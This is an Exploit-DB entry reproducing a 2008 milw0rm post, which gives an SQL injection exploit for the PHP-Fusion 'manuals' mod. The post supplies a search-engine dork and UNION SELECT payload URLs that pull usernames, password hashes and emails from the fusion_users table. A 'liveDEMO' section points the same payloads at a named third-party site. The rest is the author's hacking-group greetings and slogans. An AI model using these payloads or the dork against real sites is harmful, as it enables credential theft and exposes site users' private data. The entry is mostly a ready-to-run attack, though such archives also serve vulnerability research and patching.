PHP-Fusion Mod manuals - 'manual' SQL Injection

EDB-ID:

6681

CVE:

N/A

EDB Verified:

Author:

boom3rang

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-10-05

Vulnerable App:

########################################################
PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability
########################################################

++++++++++++++++++++++++++++
Author :         boom3rang
webpage :    www.khg-crew.ws
greetz :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group=-]
++++++++++++++++++++++++++++


[+] Dork:      infusions/manuals/manuals.php?manual=

[+] Example:         http://localhost/infusions/manuals/manuals.php?manual=[ exploit ]

[+] Exploit
--------------------------------
username:
http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1

password: 
http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1

email:
http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1
--------------------------------


[+] liveDEMO: 

http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1
http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1
http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1
============================
+Proud 2 be Albanian
+Proud 2 be Muslim
+United States of Albania
============================

# milw0rm.com [2008-10-05]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services